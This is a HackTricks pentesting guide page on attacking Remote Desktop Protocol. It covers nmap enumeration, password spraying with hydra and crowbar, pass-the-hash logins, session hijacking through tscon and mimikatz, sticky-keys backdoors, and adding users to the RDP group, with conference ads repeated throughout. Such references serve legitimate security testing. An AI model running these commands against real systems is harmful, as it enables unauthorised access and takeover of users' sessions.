hacktricks/network-services-pentesting/pentesting-rdp.md
Carlos Polop 5da23fa278 arte
2024-01-03 11:42:55 +01:00

9.1 KiB

3389 - Pentesting RDP

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

DragonJAR Security Conference es un evento internacional de ciberseguridad con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!:

{% embed url="https://www.dragonjarcon.org/" %}

Basic Information

Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software (from here).

Default port: 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Enumeration

Automatic

{% code overflow="wrap" %}

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

{% endcode %}

It checks the available encryption and DoS vulnerability (without causing DoS to the service) and obtains NTLM Windows info (versions).

Brute force

Be careful, you could lock accounts

Password Spraying

Be careful, you could lock accounts

# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

Connect with known credentials/hash

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash

Check known credentials against RDP services

rdp_check.py from impacket let you check if some credentials are valid for a RDP service:

rdp_check <domain>/<name>:<password>@<IP>

DragonJAR Security Conference es un evento internacional de ciberseguridad con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!:

{% embed url="https://www.dragonjarcon.org/" %}

Attacks

Session stealing

With SYSTEM permissions you can access any opened RDP session by any user without need to know the password of the owner.

Get openned sessions:

query user

Access to the selected session

tscon <ID> /dest:<SESSIONNAME>

Now you will be inside the selected RDP session and you will have impersonate a user using only Windows tools and features.

Important: When you access an active RDP sessions you will kickoff the user that was using it.

You could get passwords from the process dumping it, but this method is much faster and led you interact with the virtual desktops of the user (passwords in notepad without been saved in disk, other RDP sessions opened in other machines...)

Mimikatz

You could also use mimikatz to do this:

ts::sessions        #Get sessions
ts::remote /id:2    #Connect to the session

Sticky-keys & Utilman

Combining this technique with stickykeys or utilman you will be able to access a administrative CMD and any RDP session anytime

You can search RDPs that have been backdoored with one of these techniques already with: https://github.com/linuz/Sticky-Keys-Slayer

RDP Process Injection

If someone from a different domain or with better privileges login via RDP to the PC where you are an Admin, you can inject your beacon in his RDP session process and act as him:

{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %} rdp-sessions-abuse.md {% endcontent-ref %}

Adding User to RDP group

net localgroup "Remote Desktop Users" UserLoginName /add

Automatic Tools

AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself.

  • EvilRDP
    • Control mouse and keyboard in an automated way from command line
    • Control clipboard in an automated way from command line
    • Spawn a SOCKS proxy from the client that channels network communication to the target via RDP
    • Execute arbitrary SHELL and PowerShell commands on the target without uploading files
    • Upload and download files to/from the target even when file transfers are disabled on the target

HackTricks Automatic Commands

Protocol_Name: RDP    #Protocol Abbreviation if there is one.
Port_Number:  3389     #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for RDP
  Note: |
    Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software 

    https://book.hacktricks.xyz/pentesting/pentesting-rdp

Entry_2:
  Name: Nmap
  Description: Nmap with RDP Scripts
  Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}

DragonJAR Security Conference es un evento internacional de ciberseguridad con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!:

{% embed url="https://www.dragonjarcon.org/" %}

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: